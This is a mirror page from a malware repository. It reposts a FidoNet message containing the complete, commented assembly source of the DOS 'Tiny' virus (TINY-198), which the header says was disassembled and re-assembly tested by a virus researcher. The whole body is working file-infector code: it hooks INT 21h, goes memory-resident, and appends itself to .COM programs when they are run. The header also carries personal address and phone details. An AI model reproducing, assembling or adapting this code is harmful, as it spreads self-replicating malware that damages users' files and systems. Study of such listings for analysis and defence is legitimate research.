mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
232 lines
6.8 KiB
NASM
232 lines
6.8 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 21 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : TINY_198.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:40)
|
||
;* To : Gilbert Holleman
|
||
;* Subj : TINY_198.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
|
||
page ,132
|
||
name TINY198
|
||
title The 'Tiny' virus, version TINY-198
|
||
.radix 16
|
||
|
||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
|
||
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
|
||
; ú ú
|
||
; ú The 'Tiny' Virus, version TINY-198 ú
|
||
; ú Disassembled by Vesselin Bontchev, July 1990 ú
|
||
; ú ú
|
||
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
|
||
; ú ú
|
||
; ú This listing is only to be made available to virus researchers ú
|
||
; ú or software writers on a need-to-know basis. ú
|
||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||
|
||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||
|
||
code segment
|
||
assume cs:code, ds:code
|
||
|
||
org 100
|
||
|
||
seg_60 equ 600
|
||
v_len equ v_end-v_entry
|
||
|
||
start:
|
||
jmp v_entry ; Jump to virus code
|
||
db 'M' ; Virus signature
|
||
mov ax,4C00 ; Program terminate
|
||
int 21
|
||
|
||
v_entry:
|
||
call self ; Determine the start addres of the virus body
|
||
self:
|
||
pop si
|
||
sub si,3
|
||
|
||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||
|
||
; Check whether the virus is already in memory and just run the program if so:
|
||
|
||
mov ah,0E9
|
||
int 21
|
||
|
||
mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
|
||
xor cx,cx ; ES := 0
|
||
mov es,cx
|
||
mov cl,v_len ; CX := virus length
|
||
rep movsb ; Move the virus body there
|
||
|
||
; Transfer control to cont: by PUSHing its address
|
||
; on the stack and executing RETF:
|
||
|
||
push es
|
||
mov ax,cont-v_entry+seg_60
|
||
push ax
|
||
retf
|
||
|
||
; The original first 4 bytes of the infected file:
|
||
|
||
first4 db 0EBh, 2, 90, 90
|
||
|
||
; Resume execution from here (but already in segment 60h):
|
||
|
||
cont:
|
||
|
||
; Install new INT 21h handler and move the old one at INT 32h:
|
||
|
||
mov di,21*4
|
||
mov cl,2
|
||
mov ax,int_21-v_entry+seg_60
|
||
cld
|
||
lp:
|
||
push word ptr es:[di] ; Get old handler's address
|
||
pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
|
||
stosw ; Install the new one
|
||
mov ax,cs
|
||
loop lp ; Loop until done
|
||
|
||
; Save the original first 4 bytes of the infected program on the stack:
|
||
|
||
push word ptr cs:[first4-v_entry+seg_60]
|
||
push word ptr cs:[first4+2-v_entry+seg_60]
|
||
|
||
run_pgm:
|
||
mov di,offset start ; Point DI at program's start
|
||
pop word ptr [di+2] ; Restore the first 4 bytes of the program
|
||
pop word ptr [di]
|
||
pop ax ; Restore the original value of AX
|
||
push ds
|
||
push ds ; ES := DS
|
||
pop es
|
||
push di ; Push 100h on the stack
|
||
retf
|
||
|
||
mem_chk:
|
||
|
||
; Push the original first 4 bytes of the infected program on the stack:
|
||
|
||
push word ptr [si+first4-v_entry]
|
||
push word ptr [si+first4+2-v_entry]
|
||
jmp run_pgm ; And run the original program
|
||
|
||
int_21: ; New INT 21h handler
|
||
cmp ah,0E9 ; Memory check?
|
||
je mem_chk ; If infected, run the original program
|
||
cmp ax,4B00 ; EXEC function call?
|
||
jne end_21 ; Exit if not
|
||
|
||
push ax ; Save registers used
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push di
|
||
push ds
|
||
push es
|
||
|
||
push cs ; ES := CS
|
||
pop es
|
||
|
||
mov ax,3D02 ; Open the file for both reading and writting
|
||
int 32
|
||
jc end_exec ; Exit on error
|
||
mov bx,ax ; Save the file handle in BX
|
||
|
||
mov ah,3F ; Read the first 4 bytes of the file
|
||
mov cx,4 ; 4 bytes to read
|
||
mov dx,first4-v_entry+seg_60 ; Put them in first4
|
||
mov di,dx ; Save first4 address in DI
|
||
push cs ; DS := CS
|
||
pop ds
|
||
int 32 ; Do it
|
||
|
||
; Check whether the file is already infected or is an .EXE file.
|
||
; The former contains the character `M' in its 3rd byte and
|
||
; the latter contains it either in the 0th or in the 1st byte.
|
||
|
||
push di ; Save DI
|
||
mov al,'M' ; Look for `M'
|
||
repne scasb
|
||
pop di ; Restore DI
|
||
je close ; Exit if file not suitable for infection
|
||
|
||
mov ax,4202 ; Seek to the end of file
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 32 ; Do it
|
||
|
||
push ax ; Save file length
|
||
|
||
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
|
||
mov cl,v_len ; Length of virus body
|
||
mov ah,40 ; Append virus to file
|
||
int 32 ; Do it
|
||
|
||
mov ax,4200 ; Seek to the file beginning
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 32 ; Do it
|
||
|
||
mov dx,di ; Point DX at first4
|
||
mov al,0E9 ; Near JMP opcode
|
||
stosb ; Form the first instruction of the file
|
||
pop ax ; Restore file length in AX
|
||
sub ax,3 ; Subtract 3 (first instruction length)
|
||
stosw ; Form the JMP's opperand
|
||
mov al,'M' ; Add a `M' character to mark the file
|
||
stosb ; as infected
|
||
|
||
mov cl,4 ; Overwrite the first 4 bytes of the file
|
||
mov ah,40
|
||
int 32 ; Do it
|
||
|
||
close:
|
||
mov ah,3E ; Close the file
|
||
int 32
|
||
|
||
end_exec:
|
||
pop es ; Restore used registers
|
||
pop ds
|
||
pop di
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
|
||
; Exit through the original INT 21h handler:
|
||
|
||
end_21:
|
||
jmp dword ptr cs:[32*4]
|
||
|
||
v_end equ $ ; End of virus body
|
||
|
||
code ends
|
||
end start
|
||
|
||
;-+- FMail 0.96â
|
||
; + Origin: This virus is Microsoft Windows (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/iPATH Search PATH for include files
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|